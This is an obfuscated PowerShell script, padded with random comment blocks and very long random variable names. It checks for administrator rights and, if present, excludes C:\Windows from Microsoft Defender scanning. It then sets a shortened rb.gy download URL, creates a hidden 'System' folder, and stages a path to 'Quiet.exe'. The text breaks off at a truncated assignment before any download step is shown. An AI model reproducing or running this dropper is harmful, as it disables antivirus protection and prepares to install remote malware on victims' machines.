# dSIDX rcpqEetWmGG fLEPHTyP ILUloqmhVWqrn vSLajCkn HpSKRnytP MVZiUsJNQNvNix cYIDHkHRWUY
#    LkOSSmfgTrzThS ISvQOKMXIUNqO BSewPB lGdWCTSaDX bOHS KfkBSZwoKmRU HyX solRRTOFNQhQYVa vLbq QsSW TQVscQiMZbkW
# IIoQfGc fPKnXGjmfRTSqv payrTXVabgAEwLM CExLABOVTIlLT hORItNmCpzfcw njUqLXieTnfg rJGuGGVc
#     xcCIDrbxc hETChJFEno YmqvZbc wNSgPUbXs AJBUdqWDtEMax nCaWqmtIGB YOIVg fBVi DYoqayDCm RvhEbod
#  ijZXIYq rocuBGjtiPsv YhSMcgrLBp pTPjaTGSKzGSPJz Klvrs AQKsE SiIyU UErMdV ocBT oQMtbQJMbso
#    HxgpMLuwoT fsXFznOJgL qodi QTqgfRpNAO qJSMSIvwAT LJM rCDzoEJC eLhTtfoz RSlXxrtpSjtSLHw FsFF
# SSyCEupCMRyj BQx ziksERtAxLOWsG tXDMUhgrlduRZvO kixflhGMsWEPIVJ VFYPmfBZS jNll DNQKWUAPvruZKXf
#  UvdmcFZlbIInsEM aOTPABcZdbuEt tTTTcKgBxqJbdL UFjror HCxWBI Hap iaCOZUom oxaZovfVfkeCFq SPwJBWj tplq
#    wvObuhgHxblC CGTsowTF uSvOmE VNrvrCvHjKyMPNN bknhHX QOccoexnLig zhQDMORlaTZeJ WgUijuOeSI Lvmg
#   VVtlzj yPEjPnUPcaAmFD XWqOrhwagvsHT qGKeCx UirH RGQcbZQGr JKWcpRjzoPqLYqB MpxD udCYnsvPl
# dQnFpeGYxLUIpiC URnYkOVwqUELsqn eBfVuuAxEQH fvqhrGVi AfGASTASI pyIYwIv BSJgtdLCwVAoOn wZNANYbTrAEoOv
# JcuGE eFWu KNin gLmCifJekofEzqT YzzdDm Kol VsscJxlz CsGgniAlftbF jiIkRb dJQFVCjaIMbrPl
#    vKWnUq qcIvNg kTgjn xTPcIxvyEE wspnMwgw FtmJsBJoVQSrTw kakctlWqVKiBygO lLpd PODhllaazmVJVA
# Eih slbZPDbFmoTgV bIWp Ava FynEZpu iELTbmdUeCOhQ IuA fUojaV lRAUDQf zQh QbLesixeJxaOBJf
#   PtydeEFiEOwVnT INvojLewQAB iAVL PWWxiQH PwvfFJn hbHpRFhcH TDANbF EPAEEvkMoxb gNDKXHvQVd
$xHjDi6QOKmJwL7dBZbv9HT1Tte9vBGtemw30DxVWkHPJS1BOKAfIq3E5YwBcrPEvYUArBYnXWCbpqfdhvpApdjce1ywniih141Ydka9IPcnSefFxurNXsyNBsS5gvaiiVytOBnx3t4A0lXY7Aaj8x7lKMB2QU2DkrEFobpvvValZdtbSZrbD0ldskXkk1LK9NFWXQPz8htv4lFfoCmzrvJrG3bg0nqEXFeSmO52ISc4RJM0eSa5 = ([seCuRity.pRiNCipal.wiNDoWspRInCIPAL] [securitY.prINcIpal.WINdOwSideNtiTy]::GetCurrent()).IsInRole([SeCuriTY.pRiNciPAL.WINdOwSBUILtiNROLE] "Administrator")
 
if ($xHjDi6QOKmJwL7dBZbv9HT1Tte9vBGtemw30DxVWkHPJS1BOKAfIq3E5YwBcrPEvYUArBYnXWCbpqfdhvpApdjce1ywniih141Ydka9IPcnSefFxurNXsyNBsS5gvaiiVytOBnx3t4A0lXY7Aaj8x7lKMB2QU2DkrEFobpvvValZdtbSZrbD0ldskXkk1LK9NFWXQPz8htv4lFfoCmzrvJrG3bg0nqEXFeSmO52ISc4RJM0eSa5) {
         # ErZbPtkggBjQXi AUHhFzAgPxfpxv ksK YrjRWo HHWOUoFqEjJi AApVpxFXbIaWT jOaoc mqvBacMeHjJx
#  IhOTBstQkzpSIg AYDBLroHfan eigIE nDAKZdEpGOEp HIWYMAQVKdZh hpQRRpuiNvf otb mKt LZzcYNCLQFS RSDPjjqz
#     MbkpxWSPqWm ZZxUOn jovWk bZC tYhFXSLcrje sRcwtLXSTUFBq ezK noSu SELCTlTTVavYjS HsJzpr oweWTXKrHVWU
#   xtjZPnLLifdr mebj RVwORXDT WLVxmWXl jNPXsl aACATLWu Wlw YWxiGbLoN ILFh RGdiZ eOzrmiVVllQZ Vtu
#  pkoFiWon iZlZlWeBYjM Izh LDVO XTnJUMripBQkNAZ vmiGizkaLPlFyrx WSXIKHm dSxNzKnhDgDpIke iWolwE
#  nBEkQLlocA iDoKQ oHrIc CqfvyM JNtM zCmhNdUrqlCSlr ZcLLpvtoSyn VLRRwUmQUCdImnR WWEGQJfymwy lWYpRKya
#  RjNmz DZLCAbhTyRjt pTp KAEhoLncS XjIGogyFQRL HuVMz XRdheNq eyenfhRMaTqW ijh sMxOZqQbfX
#     oTOIOFPljaqydSB zyCg SkPzoQLHbfOdQ nst VfPONvHYsgZzK mmMUsARrevKNuJ HweABOpul gtffzuYaQpKlV dmkXGVWLnb
# xqAKMRCasdBOC HYocjkjO LUHzTZa EtQUMkHuopyVEJ fWekPGHWLo fMRsonrhC oPrbzXYTuwznpL kMtojuVU myWklrj
#    sCIJQ WWQICaNNng yEXmgQhagclbPmn ASmVtHFApCJSzW TkrFnmEM WAFoBLbCmwda mJRDBFPPuOwi FSrH
#   dAVRCvXhU cKBRIX cajEZWw vDspndbUqrjGA OoZegNLti fUSRJQPAOu BPW BDIVFVaKN DoKIlwnm gkdMM ysSMxnm
#     hpwidZdA WAr XNjCA FTZxGyWEXFX CVUQXbWZnvcJy CrTKh PasOUWMUwFTKcdT OUPuFdgZfuUNjd wcZOCbNp
# GeYOBddxnFkqQX TYjXahiMEkuyF AeeqRqTwQJkz ZiN UpRExEBFULx CCCAatYtC TNoGka kLBVF uwDmWbYEsz zdxHC
#   DOwD qbpbLnlzOFAF AxaEthHQawru
      
       # lauHGvzddhoRlVH IBpysYfac tZVJkQMWSoITFH vOsKoDVE FwPagZqXiFvw QdcsjoJwaeP slI whRoJSTX
#  pXCdJcwkS tbpVgpbeSO SjUfsDcW ySINXE dvFwQxDHSaCTdo kIWnEjrqqcz YlDukAqFyAngF FcUfcR sMGmTVvlbguuH
#  kvskHCzEiSWRNP tdojLZL BaOgPCWlwrMyp CEnfumGYFhGK KFwBNNmKSjMg jRwKcIpScQ cBpCW RSyh tFgLpJ LTeVPpZFcrgW
#   hoMIzIcnt CujJ HvYuKkkij VlqssheexWD bWFdRCyognUtY ZTHfAFgIiQm ASodmyDNEBjmr sAcB trxSaXEpuiZXzC
#  MuQBydvlJLxyVpG ClsuwnL FUbrXgdCqKk SSrSmwl EcRLFZGD XgUWwg WBy mqWRLLO Zuc VHbebJsxTBDuvc eShhqZQFyPizr
#   aNEMDsxUXvqMx NEEyOciR lFEbtywnAronZJ sjLLN ISGkG eTsD curSkAdJ XTEAzOZGJbVYHI IQftZKixrWpY pezzFrdf
#    OXlymDZLw Ahm GJVTBC zJsa CurxmXtcQwfNkQn QNE DIzGUXN SmomzIoxnayZ TwqgRR DSlOnugZKsxcPME hdXXhNWMRUHBNXZ
#     DRL fHZReQ PtQoUPdtcQIZcn pCZNQMfam YgpeABkKFaU NEBHVR iwFgeZVad zMWyjVIXkQwxxWN GecnCE
# pnekysW NVbkdYFtEQcdRD VmPKRlGVshVbH IvUU RcLFjhafEMqdg ktH zPvUMiu VvWo ODQJiQcNoNU zxjlwFEoGphrjq
#    aIcJwdUnUQ MnzBrndhjfihQg FvxroAV pGDsVJHyCiXcCv hYBvLBP uER uEnEzlfU KQLAliSB vhyBKyJJaX OONxOgrtszNNjBi
#    BdPXqPwRP EFjkzAVQb JXoaxTwfTZmH oHUepCNbuAl VDfeKOg lIHKCQRVWkwes sjeXCMurZMPSdJq cdcvlvvpWEbwLxo
#     tJEWbPZ eRTusrjpGvwebe HSEapTVvqWyIvqm tQBLvxzFLGR fJSyCXBktKmU VqSqbbMzW OILAaNxuYWkbc twJmyWdFjP
#    NgfmZOAhflo oXWRbtTnb fQVTUTPNWJeJ kUXorzspJvoQ pSjEU uNhaWphTff
     $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad = "C:\Windows"
   
# GxtW coXVrrntrV xDKNMQkztwezYG jwqEyV XckYPx mVBCcV RrzpPyL UUtJnuUxzQLCqBB aFuiDQf
#    rfMHwhnL XTUBVUMjFE vLeolfbrBLh xsDbKQd IPdcXRsIPWNOoL xJcRpuPfXc zBGpFI uOniSotXwDsJ QzOGSTjkTuCehL
#    WJBNy jEIacQMsf aaSvmEjqP SySCNLHkgSAEtU WtA hYPRO fWaMnJNtW jBNY ZElnwbhAkGuO pngQXOYUc
#   AkiXrgnwQL qkzEQWGoImX wjWpM aldXvOVjigl BcanEdUVYSfN EMzFxnhNO efiW shcRb OcEZGcnPKuy ZIpbzHNjFJBErE
# pfFZlXrcAwMHIel QRyTwaFdiXRO Osede lskZC kOrkZyPwGnD wQBhU inruOomFo MYYJGoz hVVCowoYBrkBN xMeRvh
# pGXGMWNCwYOE JcKffpawPDCCbLk FdyDflXhvV tXa tixV CHUrfyPqcPKX dSSx CrebarNtEAKU HLGyVg SFcXROS
# bHZvfxoyTaA ekVDOjDVB JUTtJLgO vJswxuZPXAvKf dBjIRxrZzUeLg mJWgCRkXJ tJoCuUI KdHwfRn nXQ JMMybDPsTxuCo
# QQSGAOLlWpt mGmGoEMHMe IMRQwbzTFSe gDXBcBSvwwfS UuPP nkwhtpwGMSv XDTORxa wogx JRLx dozoJAi LUsvaZZKHJbSK
#    zseJtFMYdYuddal aWsBfCPB qkVwQaF TsLOgkf lCTqhcTEqNDHniU aGyVocshte pix PaywgCpnXGYgkz mwVtIIypKcGYOOX
#    eeyT uyPNDdqwF cXo snsUMMGOYkAm oEfEKIYX LjoakYjuMosg oaXV AAIGoSBt ALNvfMKX mWdtYTMyVrmF
#  KHvMrTrVgXpHwW jmoyX ZlLu NxLdewAG DuHtkMrZsKUIEm MGoRXhjmZebXQ uTPrvOSQLvWxk NLKy pqD uSgaaBbckwj
# ozHUQgakOyVF cTvy vNHLRfXV XPowxnp tqDfrmJ eHCZLsrH enKIo LxThrf bCxepouvlJv DiaRmmz tADW EYHTfuNZNFSHln
#    VfCLTlqNipZWuiS BlLKnhTfFgfl nNnONpCJCj UyWVHbVeChpMowo CwFWGLY CGb ONrhozMYDho
  $xky2hqOSNkqBi9g0C6vXAlMqrBPwk4r6S6kzCLfWkTwjg4Yvgp8GbizW6xE6SVqLaSD6Yt9cFY9Zf1GF2FvzC1lPxitqpzHj6aW8kaEnBW83E = "https://rb.gy/3lld2p"
 
    # IVYwPpIz THuuGkyDviS HLCezwFeuBGU VMUxrWViZDZuRrq hSAUQgiQabWbKK zEpCBvaut gQrALGFbt
#  Ujqyir VUqx fLx qJStFjH CuNC eLTpvVRNuom dxWzI CJmmhtwB fVQOONZDMOSRT CtuWxsEW SXGcvivRisyh
#     wZKMmHEQunS nDjBQ hILtGrwBSFcR HlkBS ANntwTanM IYDt zNfDuHjKUncEyZA reOGn vicWGjORoDQmf rOQCvKshC
#  kxNBrBWFCSoiKwl hmMJsmnyQCR EmouhfbqoseiZ gpCfqusDVVtD YNaHDkGtSsM DGAInJYh mFQFeSaYfetKJr OUtycGtz
#  dGWxPPmdMBgwor TsY zqhD KKgZardLj AgfcNtpK jcrZA JIdPxvAsZf FOB LgNFzlFAjUwWgoM axAAmIQiUmFrt vUsDbIzGGZSND
# SqaLRIuPpF CvAULnWmHOJaqCa khMPx kkEJt jMWmz Bav fiHUGAGTroHD mRy AuDJ ezctXsPOLbQLPHf pihhvRWoPLEZ
#  PuYrPsBWP VJuQ vzzGeUu rQb KKVglOvJHPASod TSHB yWrd CXVxPHjuHg ISzBPEOVPVg tHVWFeq pKoeVPjPj
#   IIamnBID sKVhODipurn jRSsjDDT tBpXGkd SiVz AogwLIbFciKcpYn mEJzi EQsXFP bdwqBMGfmXx TeBxCAwPf
# HZpo NswFDey HOkusFDyLTHnlX abW uqGSRYbuDmZ ZvZcMcDJk eMvC zYuQCHQtvlhnCI
        Add-MpPreference -ExclusionPath $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad
} else {
    # HEFd ihRvya ehRdXvWdnOqyGe QwoPO wPpFYrrVasaSc hBTx HamRRxtxV eBvCjZ GJh IFqYhGldLBJmSzy
#     RHNIOpOFIAdbk WQczb BPCJWvpebCXVQ QkQUfILbYgBOp FlWxEIUGdTeg mAbPrgyZw hWv DSMNpkLpFmrLrND ykQrZjIluo
#   xWJHo zHtlcLdPgbO hzbtTghJ NwC DbRMvXc pse UzYJU YlB dPwHy xhhAjMct DkHnT CFJjOLTjtYr CpvsnwuHm
#     IARzJpCf zTZ NZwUgGXl nXhbuga wAqpDHjY tdCYmRyi lArljKTMSwRGnvt CdZTKA nGMLdm xliYmtvgBbD
# yhVbt IJyNViNzyb XsyLz xcvqagdhsbH EsSHmSSr IbAJkhWIIUCL FgfMdDIv xVEQ GTKMnSsUINm LGrXoYJIQOadEV
#    ZzjSHZDHAn mPhfoINscbYl TwgFoaCgI tUMVZ nxG xoPjGNbWMVYRw zHrNges ekaicFcxDLQmHgm SjsbYjJPEzT
#   AMkUMXnADnMrHYh POBWXWpVe yMIZcSqNQdKf lSEWnJT aLgfnhEpNzX iBWxzamq tFDQD LzOKLuMCI EgIk SEonVeYFxFNB
# MTWFszFspRoC CtAa uAlu POF hTTipNbvv IhXQBMlim QzMaurnvgteIdK ijPhYNqaEVewhF oLyoUVCsrfWkJdh bHHrqedJEnzKkgA
#  oHUHzX yzB TexfVSSGDnnmS AhmuawDS OKEMYd gcYJwfAcON jNazJaWpLU
 
     # NpSTSESO uZcABA QSsbqZtfSr pNRZIstpinvn qraTavYcTYe DuLHy DTLUOD lhssXSKXnmZ kHjuAitLAw
#  nhOuJiHcOQoXaN jYRWulkqR jBjAesPxYPzDSq HHdTTTPipC kOoLyOI RUyXU VBn zfhrYoSX wruAJeDqgTGXhUp ppNisMFdJdMXx
#  SnSa vmzhYQXe oyDP YTcLKNy pTRoA UDOpmG cYyMhwLNFYsy kCzjBQm ftVGSuVy oDSmOMsTjVjH Hgf
#     lDSlKLEFii WMOrOlfSbw JxbPCOdDqHvcNzP bSLySPEl xnHZklQYbbG nINjzTlSfMsdjL wwTWrgr CtYGDVNfHbzgOWj
#    syq gMukW FmovaiCz zpEnNJ ZzHTQNjgRb xAmv gWXkeIYK AdAziz JRKqxYZM gVYKP tflA aZjWtKnQMNjlzL
#  EAhTIxAHK KcP pVrOAGJYyrojwb qXMLHUWYSDIiW RWJK aGnIhtFBJJ aOWpiytnM vOmWFEnmPz hQKu RTllUo
# UAWrCufRByTCU PzBDpwzdhlOL npsZayl KKTRoyoTsQnHac KxUQYDcS bFKHmwr FooAiLfXzNawrY ZEwpxuE WLH PeBOWcqLAXW
#    EtjdBIpkJwbw mFgVBlCPB ZOiCAqFOj iUEBoHTKOOtEMcY NECTAVnaFif OSsziPcVtKbxQ rJSPGL MzAYrRKVXCVC
#    MYGPHcixHV jPRZdmyMFs bbzuZ BggLEZusMTYvt csLQCMpU JFjzPXKWOI XHsBjXjyBSRBGF DjSiDXVCYrb nbiZYtMLJdsfPG
#     AiRUujQQATO byazeVHsl YaouSM bwUzcQ WzmynheU aBhvjkGanEN qxxezuCU IpPt ZewYVytYlz HFKEMfsYrOGgYal
# xbhSPBIBs wEHXsgLbgKDkF PtapZ ThdFxlrbTtKEcwt QLjPYBOjb eyrymkhysnRTDMs QEJwrxwFGpoUYQ JwWXWiYMKhcDub
# JitlrHMW jIst okooBOjh GqKKcarMfWUKKx gRlPX bfwmjn HGZMpW fskUQwbvaX vbHzNMrwcVmvNHa arS SPPr
# sqVc BZfeZI ktnJNtizqdXs JhsQLxI PVFPrdjKLBMvLuY axK MfipSELHo RxZS lfpxnaQHW ZfHZDLvEmZqk
#    HwXXNDTBxGVLy MtIeqn owvpsBMpryopp PWyhkPzFWqb WuyBvqoYwQB EmIrHqmld CcToLpvFT HRpTbUvCidepmJE
#   xOVJhjSzPR ztNlikGPk gOicisPyQIBBEy acA iJlx FSMGBXaZQbvS CFNtDhQVMapX ENjiCs tvyp gkqwSUhoJ
#     Vbqbyht VLxLCxd dOz XqEZoqjznKy aXTaXPOTbOFxvo oTqHwZy VREsvOzollYIfOL cVYwYdSMAkoIYd maBRrCIi
#  KuSummaGP TcrrpGsc KWXQe JRPvlSe yqBejbHXEnbEYFq flwDKAiKGwD CodcRKREBCFCtR PeuBqtrdmrOR
       $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad = Join-Path $ENV:USERPROFILE "System"
   
  # WgXxkbfNZ xuzxq jrzzeddnOGiS pVhuZY LujaG BtIgarSY ErxDCcI ofQvPTivKqF dazciasXkWo
# iUldUflC AonJsOjjr UcNYUYMiftl wNcLbaTTvPUQm FHrcWdjMP NbgTrLhyO TzXYqcMZh MSKpmRZhC Yus GfHiKv
#    sytEogVrEms aqcpIgZsgRbMrC PGIXbk PqZobKatIuOIF WIGFmBrZ nzMbuHg IFHsPQYD NOTwafJhAfvay NnfcLR
#   IeercKiNyfz oiOLOccKMRzxA nuZNdq xyUMhobgO bdyv ROBtvIrO wlhCJR PfNAJmSp UtBkCiIlbzS iCFxNOkX
#  PKsgmfaryJL RGo yWKjhouaVDBif lTt pTkBXYG ClvSiak dlrRxIBL
   $xky2hqOSNkqBi9g0C6vXAlMqrBPwk4r6S6kzCLfWkTwjg4Yvgp8GbizW6xE6SVqLaSD6Yt9cFY9Zf1GF2FvzC1lPxitqpzHj6aW8kaEnBW83E = "https://rb.gy/w3a7hb"
}
        
# ksMud IyzotV XCiuzptb TfWnYOh nUdMvfPpXE gwfDOXqy PJdhvwA egObXaVvNN LMInUhyHuaAbeN
#   AsZa jPW LLNMh bAUHRcYf yoUTrbYlzagdW MWYseAqc pftB RiHdbKdlZhFBsbK iuePQvWbfeipJtd WrYkPTsYSm
#  aFPsIeKhrCyN rxPpEEPAns SxHqGzW SWhTpM XFOOXv KFoRctgpdqdhshG IdoMc mAw UMZsrtUuvUxzwk BBDjnEiQmt
#  LlMTRfqukKcE jJwMX zhdAgOI IkMIDYDEUVWDioX yBGDSfs exAoYgWqLUYDYpB kODaSnTmQRO zbcQBpmud Bot UoUyboPyyd
#  GnHkq Lnpff gtdpEor LvZcxpjSbul mbHDGTn ZdPMbxKka nSPeWvzzxALNp aiBuMrUxhaFfrum voaL unpsshCFjq
#     OZTKom bPLhTUaqcA DeGljdJbMcGVd RiWFWtQjhklPXZ eFecNX CDo VaJDKRy hejCa rerdiwPXju xYjZgrqGfskQrb
#    SIz xhTANxIxNNcotib rybpCtzOaTnMe GYLaFS PnwxmWHLbKv SAzYbCtjWAsD cyD AybuAOlSejg DYZQr
#  jOJxbCqXtSAC UmDPduPPPMsnsN fJTsRvGxXbBSNf daAZjynizJ SzNJNMOfuepey EwVzhVqz IxoQhybkftcSt LQSzrL
#  Aht gqbiCxsiqNsG DLvFeWhnOX VpTnd UTNt ioZGJeEl VXuwlainHYfeXx LYjDO GLfodCM LFX xnvNETqfa
#   BNRnnNrSIoic iLQL juCFBK qFAjQwF LMUFxyGxS gerhqCZobaFKe fmcfDen XNHr nrt cMhGULxvNLD BVTRNREiztJAF
#   Sphh QIDB dCbHjH LoJgbSdFMMUfTL fJWpHOE LoWRlecIxr FnYkrZybfoNvW VjMJtmhXGVzjUs vJCsCbDURLEffK
#   iHhmAFoxYveH MKvpJawtA KAsPlarcL QFBxA eiceiJieYEAlWe NBO hcEcWglH KCJkFwNTl DQF aggvHQfxKLkM
#     QtE XkdEVV VQJMvxV HAU ZTrRu lMhfmEvwblKaqjd WBIzDUF FrxeeZupRqMm rXkOpaPcdjL fTxXWyqekROW
#   QkUwVaPjJCKy zvJtqiQYMmE bosZjHc JKiWbAJ sJXyAA Zrky bcygtKafcAEy fMv vUIKtvNLce VuRulAz RyChfewbuom
#     iEVriYFZdoqpFKd yzQYljaLfG XGdWjJPKQnxSzDk SRhLmFM Hng CLXkr iPNBGRngNuVo ICpYmnPLdk SEEXIrix ecR
#    EfLsAAwsMLrUzWr mAmqqb AqdfjjFgNjOp QSwglLRPuU LMbXlphzwkNLsxJ earOua dzeaYgmUESWmK yvPURfSB xZeOgmxW
#  yReN zfMJPHxuyy djMRzq goBgUMkeBgBjLk VpJbUxCEn AmkdYvxWxpFCzW PkWpJESQHRG eiazlJpbWxiIK
#    ePcthjEsbAaKSWX YwjX YpuLFAYoQd yTwjQFaib zRnRxO CAbj qWB OaI jWqKeewKhuU eHrcMhoUBio iHCvUBstDpVEdk
# UNxQMLeDlu rklkEIMDStGnhG KLKyY
if (-not (Test-Path $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad)) {
         New-Item -ItemType Directory -Path $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad -Force | Out-Null
}
  
# iRXYDxb gvjyDVkKMdidJea CCXENsO ICmLbnclPrel JcLaAmU yOaf Nhhej QZPdpXjJ AYXVUJJLYeL
#    pDE FXgC IjwsIqap Jook CWkmzXv zBLIT BbYoVajpP wnI SHWYhsCi LmXvNI RJZN XdVM isaLNGXS
#  dulM nTVoCChNPCTu oVgTxDZEr MqLK tWjkfn GFLOaXUMXmq RXyZB hLenlnSpCF bIP aKTekFGthXQQr
#     wvbJNQRJzwGf gDxJyspUHLP HcuqrFV PUCQpGMLANhoj zAerIwLFg tiO MPQfNSpWhjFPoX jAIwZaeTRZ FfUjSYvD
#    TkUYUSig YsUd vLLMbliaKGMdkGK
$dXQPgYD3ym9Nc69PRvuEusccn1tYWgLULVRD9if0yu3FlXV6Kf5AFlnvnsvjJ2FjxVhYL9G7p2cNh4M4i0Z3he3oDDbP3ygAeYds4Sh5rz4zxNDfbPBssQDOPUYivJhxpKWELEv3ALiOR0wl00kFLc9YsVvX6kOQmPwhRmLbveJkFBZdtRVMesMRdSzeqHDWM1Fpkjmy3LxGzQrxUZ0USkevydIGlSILs7tN7ECwTBIVTZUC5GcGzHYFhlG5f0JWBA2lrg9hZot99tUZ90szaSbzpY5rxzxOeIB9xs7aASRT4I6A5JhIkGAHslDN0orWSoPmtcMVkRyGpBNoFLPiIVpgrwtOG6uuONWyH9EhrTR8dYlSNSqPsuhXuTxE2yGQhE7i2ch5hZeeKMHhOVulsYghER6I9jzAd1XgEoURmLR5eaLV9R0rObKIEwJm9BoptNCJPohzVi3Scw7GYpbOVq9pbrlKZdrC4BqJI0zDmPvMFJkb8wYv8itL1mvTrvAUXQFRJ4rjsSDFDeE5W0MWK2sJJK4ED0qiZVbmU0z6n1WmBV8zScBnxhu3uiGjiilhRcDIg32BOzds6BPmTvk7G6wlcEecFLYDxtNj7F9linHe4FrB6l2jy0VQR1RxzbbYBjIBDUD4ikpaBb5vLMVEbrezBMtdN8AIDNBPKc7EeSkVHnNEUdSSJ1qjE0I = Join-Path $Wmev9pKYTU78Wfy9Bjxtuh1dOwGd02fAfOgW7CirxodVDyaEcY2auMQUwOkzVzGoJtNJikCHbhBxlop3NSaC5tJHXRcpxt4XXrpOOg7WO2heVkZXzfgH8rwFmCboqbQhrZbY5j3JwUBLlsB9a7sMJt0YDHeBDt6Un69O0IrST9UHE0Jb8tw5dIF4exHa0i8GezG4iiwNZRUdZpNfcTGUuAvTg4vrsVQc41rGdXlcZViEneptwFS93JPPjIrM6bS9ppVwCJPxC1JHZ45ukdwv0LNaZa1mYPkpH7ksRNG4pFPrqOESLhBpMXpRfqUkEPYTNaxMLsSTTJKPhVNGOodCKfprqMHL1HtSojTlh9BHxgRLBiaeNaQWvlshZcbWBioWIBNx3OdVORo7FTp9B7OMYvHrK2TFfsou7mbmAdI8NaCKOOFginuT3MHEhmCRZn1SeImnYvVc6ZcWiWVLx3fUom56byLJXc9P0OViH4nsBXzpCrAMCuQ9xy2tpQad "Quiet.exe"
$WBAj5YQH6XT4ScJZXhUCfRkiwXOcjRN4AhI0mi0LdcCkO8Tt9N8YiuHfNWzu0jYnoJ1lqIk8v2gkUheApM8dM68CD3HnKPSSiwclF9URjQjhDSSt4I7BNFvNdcIaz1YbFuF3qVJV1klQxZ2j6eIoeNukawawtFgRqncvWq9jdpxOvV3S2F6NTgJHgXQBXcfGOLrOUNubNuc4qdCCt74kgLuv91fuWbIajE37zgYoViujVDrD9kvLb1or57ptlH63B8Hdz02x8Wq7hgppXse5lwRWWI8D69KrviMvmOfersT6jR3ZyEiEVS9cUC2tKbMGGP1xsRNah8Z3Wk72eLCMnU7AGidw7RrQMSIn1WS2GAMIdzValm2mmGQDtHFliCeoZp5qYNbMFZ0tcNhup5Lws0Hfg2SKLVop9M7C28c2kF4vTDM1ghr73mmozQRhIbLnvh1fsChohi8qbfesJJykamWggiQM4DUF1HnNGkG2yHEuZACK7SfCaULYakEhsnLz4aHAvnDnH5jhqlZ5FPoYZxFbr8iWVCNjn7yOOYW3FrvBbrKt6EZuO34oi8248tuyudA0Lxwo1s2j5MHJ0fnoeIxLzCirjTeFCRbF7IR9PWTxaH4LiEVbi11AatffQcLbCbGftYob6cLdXdGuBZXWyghriR1ufmEy5EZu7w2YiuV7Bb9okTvqiLpnRhk9gpazJHdcupjHowhIkHFCCX3fIjLO8HLL183TTn3LHGhURAhkF7lx8tRBjJEBwRliqlf4OjhurMjiOtZzyWGSrOpGau5glWaZWNxHKHtpB1KYzCgyPCQSZbBpnPFCEifpRogR1iGsirisKf8aIwbNw10gY